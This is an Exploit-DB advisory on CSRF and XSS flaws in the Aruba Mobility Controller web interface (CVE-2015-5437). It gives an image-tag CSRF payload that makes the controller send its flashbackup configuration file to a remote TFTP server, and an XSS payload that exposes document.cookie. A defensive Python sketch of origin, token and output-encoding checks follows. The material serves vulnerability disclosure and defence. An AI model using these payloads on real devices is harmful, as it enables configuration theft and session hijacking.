Aruba Mobility Controller - Multiple vulnerabilities

ID EDB-ID:37891
Type exploitdb
Reporter Itzik Chen
Modified 2015-08-20T00:00:00


Aruba Mobility Controller - Multiple vulnerabilities. CVE-2015-5437. Webapps exploit for xml platform

# Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities
# Date: 08/016/2015
# Author: Itzik Chen
# Product web page:
# Affected Version:
# Tested on: Aruba7240, Ver



Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi.
Aruba Controller suffers from CSRF and XSS vulnerabilities.

Proof of Concept - CSRF
=========================
- Controller IP-Address
- Remote TFTP server

<IMG width=1 height=1 SRC=",,flashbackup.tar.gz">

That will send the flashbackup configuration file to a remote TFTP server.

Proof of Concept - XSS
=========================
</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>
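
A server-side sketch of the controls that address both proofs of concept above, added here as an example and not taken from the advisory or from Aruba's code: it refuses state changes triggered by an image load or a cross-site page, and HTML-encodes reflected values. The function names, the host name controller.example and the token values are hypothetical.

```python
import hmac
import html
from urllib.parse import urlsplit


def allow_state_change(method, headers, host, session_token, form_token):
    """Decide whether a request may trigger a state-changing action.

    All names here are hypothetical; returns (allowed, reason).
    """
    h = {k.lower(): v for k, v in headers.items()}
    # An <img src=...> tag can only issue GET, so state changes require POST.
    if method.upper() != "POST":
        return False, "state change requires POST"
    # Fetch metadata, when the browser sends it, must say same-origin.
    if h.get("sec-fetch-site", "same-origin") != "same-origin":
        return False, "cross-site request"
    # Origin (Referer as fallback) must name this host; "null" fails too.
    source = h.get("origin") or h.get("referer") or ""
    if urlsplit(source).netloc.lower() != host.lower():
        return False, "origin mismatch"
    # Per-session anti-CSRF token, compared in constant time.
    if not form_token or not hmac.compare_digest(
            session_token.encode(), form_token.encode()):
        return False, "bad CSRF token"
    return True, "ok"


def render_cell(value):
    """HTML-encode a reflected value before writing it into a table cell."""
    return "<td>" + html.escape(value, quote=True) + "</td>"


if __name__ == "__main__":
    HOST = "controller.example"  # constructed host name
    # Constructed request: an image load from a page on another site.
    print(allow_state_change("GET", {"Referer": "https://other.example/"},
                             HOST, "s3ss10n", None))
    # The XSS string from the advisory, rendered inert.
    print(render_cell("</td><img width=1 height=1 "
                      "src=/images/logo-mobility-controller.gif "
                      "onLOAD=alert(document.cookie)>"))
```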